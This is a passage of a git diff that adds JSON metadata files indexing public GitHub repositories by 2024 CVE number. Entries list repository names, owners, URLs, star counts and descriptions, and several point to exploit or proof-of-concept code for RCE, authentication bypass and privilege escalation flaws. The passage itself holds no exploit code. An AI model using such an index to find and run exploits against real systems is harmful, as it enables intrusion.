arbitrary system commands via the Cmd parameter.", + "fork": false, + "created_at": "2024-05-19T19:05:00Z", + "updated_at": "2024-11-02T04:36:19Z", + "pushed_at": "2024-05-19T19:12:32Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812434204, + "name": "CVE-2024-29269", + "full_name": "dream434\/CVE-2024-29269", + "owner": { + "login": "dream434", + "id": 114837630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114837630?v=4", + "html_url": "https:\/\/github.com\/dream434", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dream434\/CVE-2024-29269", + "description": "An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.", + "fork": false, + "created_at": "2024-06-08T22:06:33Z", + "updated_at": "2024-10-09T13:46:14Z", + "pushed_at": "2024-10-09T13:46:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822837368, + "name": "CVE-2024-29269-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-29269-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-29269-EXPLOIT", + "description": "A PoC exploit for CVE-2024-29269 - Telesquare TLR-2005KSH Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-07-01T23:49:59Z", + "updated_at": "2024-11-26T16:10:08Z", + "pushed_at": "2024-07-02T00:00:59Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugs", + "critical", + "cve-2024-29269", + "devices", + "exploit", + "exploitation", + "exploits", + "iot", + "poc", + "proof-of-concept", + "rce", + "rce-exploit", + "rce-scanner", + "remote-code-execution", + "router", + "telesquare", + "tlr-2005ksh", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 854044213, + "name": "CVE-2024-29269-RCE", + "full_name": "hack-with-rohit\/CVE-2024-29269-RCE", + "owner": { + "login": "hack-with-rohit", + "id": 162045216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162045216?v=4", + "html_url": "https:\/\/github.com\/hack-with-rohit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hack-with-rohit\/CVE-2024-29269-RCE", + "description": null, + "fork": false, + "created_at": "2024-09-08T08:56:33Z", + "updated_at": "2024-10-18T22:56:35Z", + "pushed_at": "2024-09-08T09:24:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 864624119, + "name": "CVE-2024-29269", + "full_name": "Quantum-Hacker\/CVE-2024-29269", + "owner": { + "login": "Quantum-Hacker", + "id": 140636140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140636140?v=4", + "html_url": "https:\/\/github.com\/Quantum-Hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Quantum-Hacker\/CVE-2024-29269", + "description": null, + "fork": false, + "created_at": "2024-09-28T18:01:30Z", + "updated_at": "2024-09-28T18:22:23Z", + "pushed_at": "2024-09-28T18:22:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29272.json b/2024/CVE-2024-29272.json new file mode 100644 index 0000000000..18658d6e8b --- /dev/null +++ b/2024/CVE-2024-29272.json @@ -0,0 +1,33 @@ +[ + { + "id": 777466221, + "name": "CVE-2024-29272", + "full_name": "awjkjflkwlekfdjs\/CVE-2024-29272", + "owner": { + "login": "awjkjflkwlekfdjs", + "id": 164954340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164954340?v=4", + "html_url": "https:\/\/github.com\/awjkjflkwlekfdjs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/awjkjflkwlekfdjs\/CVE-2024-29272", + "description": null, + "fork": false, + "created_at": "2024-03-25T22:43:42Z", + "updated_at": "2024-03-25T22:44:59Z", + "pushed_at": "2024-03-26T06:59:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29275.json b/2024/CVE-2024-29275.json new file mode 100644 index 0000000000..76f109a0eb --- /dev/null +++ b/2024/CVE-2024-29275.json @@ -0,0 +1,33 @@ +[ + { + "id": 817879551, + "name": "nuclei_template", + "full_name": "Cyphercoda\/nuclei_template", + "owner": { + "login": "Cyphercoda", + "id": 27870649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27870649?v=4", + "html_url": "https:\/\/github.com\/Cyphercoda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyphercoda\/nuclei_template", + "description": "CVE-2024-29275.yaml", + "fork": false, + "created_at": "2024-06-20T16:19:30Z", + "updated_at": "2024-07-28T07:14:30Z", + "pushed_at": "2024-06-20T17:25:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29278.json b/2024/CVE-2024-29278.json new file mode 100644 index 0000000000..85475539b5 --- /dev/null +++ b/2024/CVE-2024-29278.json @@ -0,0 +1,33 @@ +[ + { + "id": 779182155, + "name": "cve", + "full_name": "QDming\/cve", + "owner": { + "login": "QDming", + "id": 109197048, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109197048?v=4", + "html_url": "https:\/\/github.com\/QDming", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QDming\/cve", + "description": "Use CVE-2024-29278", + "fork": false, + "created_at": "2024-03-29T08:20:23Z", + "updated_at": "2024-03-29T08:20:23Z", + "pushed_at": "2024-03-29T08:51:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2928.json b/2024/CVE-2024-2928.json new file mode 100644 index 0000000000..05c08ea526 --- /dev/null +++ b/2024/CVE-2024-2928.json @@ -0,0 +1,33 @@ +[ + { + "id": 885154667, + "name": "CVE-2024-2928", + "full_name": "nuridincersaygili\/CVE-2024-2928", + "owner": { + "login": "nuridincersaygili", + "id": 45103481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45103481?v=4", + "html_url": "https:\/\/github.com\/nuridincersaygili", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nuridincersaygili\/CVE-2024-2928", + "description": "Arbitrary file read exploit for CVE-2024-2928 in mlflow ", + "fork": false, + "created_at": "2024-11-08T03:55:08Z", + "updated_at": "2024-11-20T12:08:00Z", + "pushed_at": "2024-11-08T04:11:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29296.json b/2024/CVE-2024-29296.json new file mode 100644 index 0000000000..d2a6146769 --- /dev/null +++ b/2024/CVE-2024-29296.json @@ -0,0 +1,68 @@ +[ + { + "id": 784425919, + "name": "CVE-2024-29296", + "full_name": "ThaySolis\/CVE-2024-29296", + "owner": { + "login": "ThaySolis", + "id": 75222240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75222240?v=4", + "html_url": "https:\/\/github.com\/ThaySolis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThaySolis\/CVE-2024-29296", + "description": "CVE-2024-29296 - User enumeration on Portainer CE - 2.19.4", + "fork": false, + "created_at": "2024-04-09T20:36:03Z", + "updated_at": "2024-12-18T01:47:05Z", + "pushed_at": "2024-12-18T01:47:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793734104, + "name": "CVE-2024-29296-PoC", + "full_name": "Lavender-exe\/CVE-2024-29296-PoC", + "owner": { + "login": "Lavender-exe", + "id": 32195948, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32195948?v=4", + "html_url": "https:\/\/github.com\/Lavender-exe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lavender-exe\/CVE-2024-29296-PoC", + "description": "User Enumeration through response time difference", + "fork": false, + "created_at": "2024-04-29T19:09:41Z", + "updated_at": "2024-04-29T23:58:37Z", + "pushed_at": "2024-04-29T19:12:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "enumeration", + "portainer" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29375.json b/2024/CVE-2024-29375.json new file mode 100644 index 0000000000..b85244e6f8 --- /dev/null +++ b/2024/CVE-2024-29375.json @@ -0,0 +1,33 @@ +[ + { + "id": 770488543, + "name": "CVE-2024-29375", + "full_name": "ismailcemunver\/CVE-2024-29375", + "owner": { + "login": "ismailcemunver", + "id": 154702425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154702425?v=4", + "html_url": "https:\/\/github.com\/ismailcemunver", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ismailcemunver\/CVE-2024-29375", + "description": "CSV Injection in Addactis IBNRS 3.10.3.107", + "fork": false, + "created_at": "2024-03-11T16:32:41Z", + "updated_at": "2024-03-30T12:45:25Z", + "pushed_at": "2024-04-03T06:56:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29399.json b/2024/CVE-2024-29399.json new file mode 100644 index 0000000000..f46b927bcf --- /dev/null +++ b/2024/CVE-2024-29399.json @@ -0,0 +1,33 @@ +[ + { + "id": 783958528, + "name": "CVE-2024-29399", + "full_name": "ally-petitt\/CVE-2024-29399", + "owner": { + "login": "ally-petitt", + "id": 76501220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76501220?v=4", + "html_url": "https:\/\/github.com\/ally-petitt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ally-petitt\/CVE-2024-29399", + "description": "CVE-2024-29399 reference", + "fork": false, + "created_at": "2024-04-08T23:03:04Z", + "updated_at": "2024-04-10T04:07:47Z", + "pushed_at": "2024-04-08T23:18:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29404.json b/2024/CVE-2024-29404.json new file mode 100644 index 0000000000..289d4ccfce --- /dev/null +++ b/2024/CVE-2024-29404.json @@ -0,0 +1,33 @@ +[ + { + "id": 893452720, + "name": "CVE-2024-29404_Razer", + "full_name": "mansk1es\/CVE-2024-29404_Razer", + "owner": { + "login": "mansk1es", + "id": 74832816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74832816?v=4", + "html_url": "https:\/\/github.com\/mansk1es", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mansk1es\/CVE-2024-29404_Razer", + "description": null, + "fork": false, + "created_at": "2024-11-24T13:43:36Z", + "updated_at": "2024-12-20T15:01:41Z", + "pushed_at": "2024-11-27T12:02:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29415.json b/2024/CVE-2024-29415.json new file mode 100644 index 0000000000..c9276ad194 --- /dev/null +++ b/2024/CVE-2024-29415.json @@ -0,0 +1,33 @@ +[ + { + "id": 824470499, + "name": "node-ip-vex", + "full_name": "felipecruz91\/node-ip-vex", + "owner": { + "login": "felipecruz91", + "id": 15997951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15997951?v=4", + "html_url": "https:\/\/github.com\/felipecruz91", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/felipecruz91\/node-ip-vex", + "description": "Sample project that uses VEX to supress CVE-2024-29415.", + "fork": false, + "created_at": "2024-07-05T07:50:29Z", + "updated_at": "2024-09-18T22:48:03Z", + "pushed_at": "2024-07-05T09:49:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29510.json b/2024/CVE-2024-29510.json new file mode 100644 index 0000000000..4c508e003f --- /dev/null +++ b/2024/CVE-2024-29510.json @@ -0,0 +1,33 @@ +[ + { + "id": 826318568, + "name": "CVE-2024-29510", + "full_name": "swsmith2391\/CVE-2024-29510", + "owner": { + "login": "swsmith2391", + "id": 50335205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50335205?v=4", + "html_url": "https:\/\/github.com\/swsmith2391", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swsmith2391\/CVE-2024-29510", + "description": "POC code for CVE-2024-29510 and demo VulnApp", + "fork": false, + "created_at": "2024-07-09T13:27:40Z", + "updated_at": "2024-07-10T17:37:31Z", + "pushed_at": "2024-07-10T17:34:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2961.json b/2024/CVE-2024-2961.json new file mode 100644 index 0000000000..851b3e7e19 --- /dev/null +++ b/2024/CVE-2024-2961.json @@ -0,0 +1,229 @@ +[ + { + "id": 791152279, + "name": "FIX-CVE-2024-2961", + "full_name": "mattaperkins\/FIX-CVE-2024-2961", + "owner": { + "login": "mattaperkins", + "id": 37165019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37165019?v=4", + "html_url": "https:\/\/github.com\/mattaperkins", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mattaperkins\/FIX-CVE-2024-2961", + "description": "Quick mitigation script ", + "fork": false, + "created_at": "2024-04-24T07:32:08Z", + "updated_at": "2024-06-06T00:03:18Z", + "pushed_at": "2024-04-24T07:43:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803147840, + "name": "CVE-2024-2961", + "full_name": "rvizx\/CVE-2024-2961", + "owner": { + "login": "rvizx", + "id": 84989569, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4", + "html_url": "https:\/\/github.com\/rvizx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvizx\/CVE-2024-2961", + "description": "CVE-2024–2961 Security Issue Mitigation Script", + "fork": false, + "created_at": "2024-05-20T06:53:23Z", + "updated_at": "2024-07-10T16:47:26Z", + "pushed_at": "2024-05-20T07:12:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806456046, + "name": "cnext-exploits", + "full_name": "ambionics\/cnext-exploits", + "owner": { + "login": "ambionics", + "id": 29630660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29630660?v=4", + "html_url": "https:\/\/github.com\/ambionics", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ambionics\/cnext-exploits", + "description": "Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()", + "fork": false, + "created_at": "2024-05-27T08:30:06Z", + "updated_at": "2024-12-31T12:11:37Z", + "pushed_at": "2024-09-30T08:45:56Z", + "stargazers_count": 426, + "watchers_count": 426, + "has_discussions": false, + "forks_count": 53, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 53, + "watchers": 426, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 808153966, + "name": "iconvfix", + "full_name": "absolutedesignltd\/iconvfix", + "owner": { + "login": "absolutedesignltd", + "id": 11164000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11164000?v=4", + "html_url": "https:\/\/github.com\/absolutedesignltd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absolutedesignltd\/iconvfix", + "description": "Bash script to patch for CVE-2024-2961", + "fork": false, + "created_at": "2024-05-30T13:45:43Z", + "updated_at": "2024-05-30T13:57:37Z", + "pushed_at": "2024-05-30T13:57:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 810040956, + "name": "test_iconv", + "full_name": "exfil0\/test_iconv", + "owner": { + "login": "exfil0", + "id": 84948741, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84948741?v=4", + "html_url": "https:\/\/github.com\/exfil0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exfil0\/test_iconv", + "description": "This repository contains a C program to test for CVE-2024-2961, a buffer overflow vulnerability in the iconv() function of glibc.", + "fork": false, + "created_at": "2024-06-03T23:53:43Z", + "updated_at": "2024-06-04T00:22:16Z", + "pushed_at": "2024-06-04T00:22:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer", + "cve", + "cve-202402961", + "glibc", + "iconv", + "overflow", + "pentest", + "test", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810186958, + "name": "cve-2024-2961", + "full_name": "tnishiox\/cve-2024-2961", + "owner": { + "login": "tnishiox", + "id": 163162093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163162093?v=4", + "html_url": "https:\/\/github.com\/tnishiox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tnishiox\/cve-2024-2961", + "description": null, + "fork": false, + "created_at": "2024-06-04T08:05:09Z", + "updated_at": "2024-06-04T09:01:19Z", + "pushed_at": "2024-06-04T09:01:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810234472, + "name": "CVE-2024-2961_poc", + "full_name": "kjdfklha\/CVE-2024-2961_poc", + "owner": { + "login": "kjdfklha", + "id": 106435455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106435455?v=4", + "html_url": "https:\/\/github.com\/kjdfklha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kjdfklha\/CVE-2024-2961_poc", + "description": null, + "fork": false, + "created_at": "2024-06-04T09:57:46Z", + "updated_at": "2024-09-20T09:16:54Z", + "pushed_at": "2024-06-04T10:02:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29671.json b/2024/CVE-2024-29671.json new file mode 100644 index 0000000000..24d7efe84c --- /dev/null +++ b/2024/CVE-2024-29671.json @@ -0,0 +1,33 @@ +[ + { + "id": 892033272, + "name": "CVE-2024-29671-POC", + "full_name": "laskdjlaskdj12\/CVE-2024-29671-POC", + "owner": { + "login": "laskdjlaskdj12", + "id": 16471540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16471540?v=4", + "html_url": "https:\/\/github.com\/laskdjlaskdj12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/laskdjlaskdj12\/CVE-2024-29671-POC", + "description": "This is POC of CVE-2024-29671", + "fork": false, + "created_at": "2024-11-21T11:51:04Z", + "updated_at": "2024-12-17T12:22:28Z", + "pushed_at": "2024-12-17T12:22:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29824.json b/2024/CVE-2024-29824.json new file mode 100644 index 0000000000..454203ad14 --- /dev/null +++ b/2024/CVE-2024-29824.json @@ -0,0 +1,64 @@ +[ + { + "id": 814183258, + "name": "CVE-2024-29824", + "full_name": "horizon3ai\/CVE-2024-29824", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-29824", + "description": "Ivanti EPM SQL Injection Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2024-06-12T13:53:32Z", + "updated_at": "2024-12-25T11:31:21Z", + "pushed_at": "2024-06-12T14:04:39Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 23, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 816713290, + "name": "CVE-2024-29824", + "full_name": "R4be1\/CVE-2024-29824", + "owner": { + "login": "R4be1", + "id": 110738599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110738599?v=4", + "html_url": "https:\/\/github.com\/R4be1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R4be1\/CVE-2024-29824", + "description": "Ivanti EPM SQL Injection Remote Code Execution Vulnerability(Optimized version based on h3)", + "fork": false, + "created_at": "2024-06-18T09:07:23Z", + "updated_at": "2024-08-30T12:30:12Z", + "pushed_at": "2024-06-19T08:17:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29847.json b/2024/CVE-2024-29847.json new file mode 100644 index 0000000000..8656a7f2b7 --- /dev/null +++ b/2024/CVE-2024-29847.json @@ -0,0 +1,33 @@ +[ + { + "id": 857524820, + "name": "CVE-2024-29847", + "full_name": "sinsinology\/CVE-2024-29847", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-29847", + "description": "Exploit for CVE-2024-29847", + "fork": false, + "created_at": "2024-09-14T21:51:41Z", + "updated_at": "2024-12-14T20:58:12Z", + "pushed_at": "2024-09-15T08:07:22Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29849.json b/2024/CVE-2024-29849.json new file mode 100644 index 0000000000..8e23dc643d --- /dev/null +++ b/2024/CVE-2024-29849.json @@ -0,0 +1,33 @@ +[ + { + "id": 812906778, + "name": "CVE-2024-29849", + "full_name": "sinsinology\/CVE-2024-29849", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-29849", + "description": "Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849)", + "fork": false, + "created_at": "2024-06-10T06:12:20Z", + "updated_at": "2024-11-21T05:22:48Z", + "pushed_at": "2024-06-13T08:40:57Z", + "stargazers_count": 86, + "watchers_count": 86, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 86, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29855.json b/2024/CVE-2024-29855.json new file mode 100644 index 0000000000..e34868897f --- /dev/null +++ b/2024/CVE-2024-29855.json @@ -0,0 +1,33 @@ +[ + { + "id": 814554778, + "name": "CVE-2024-29855", + "full_name": "sinsinology\/CVE-2024-29855", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-29855", + "description": "PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855", + "fork": false, + "created_at": "2024-06-13T08:32:55Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-06-17T10:45:06Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29863.json b/2024/CVE-2024-29863.json new file mode 100644 index 0000000000..b45d731dc6 --- /dev/null +++ b/2024/CVE-2024-29863.json @@ -0,0 +1,33 @@ +[ + { + "id": 832020588, + "name": "qlikview-poc-CVE-2024-29863", + "full_name": "pawlokk\/qlikview-poc-CVE-2024-29863", + "owner": { + "login": "pawlokk", + "id": 93943097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93943097?v=4", + "html_url": "https:\/\/github.com\/pawlokk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pawlokk\/qlikview-poc-CVE-2024-29863", + "description": "PoC for LPE with QlikView", + "fork": false, + "created_at": "2024-07-22T07:38:34Z", + "updated_at": "2024-07-22T07:40:44Z", + "pushed_at": "2024-07-22T07:40:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29868.json b/2024/CVE-2024-29868.json new file mode 100644 index 0000000000..425d97010a --- /dev/null +++ b/2024/CVE-2024-29868.json @@ -0,0 +1,33 @@ +[ + { + "id": 819463002, + "name": "CVE-2024-29868", + "full_name": "DEVisions\/CVE-2024-29868", + "owner": { + "login": "DEVisions", + "id": 88578649, + "avatar_url": 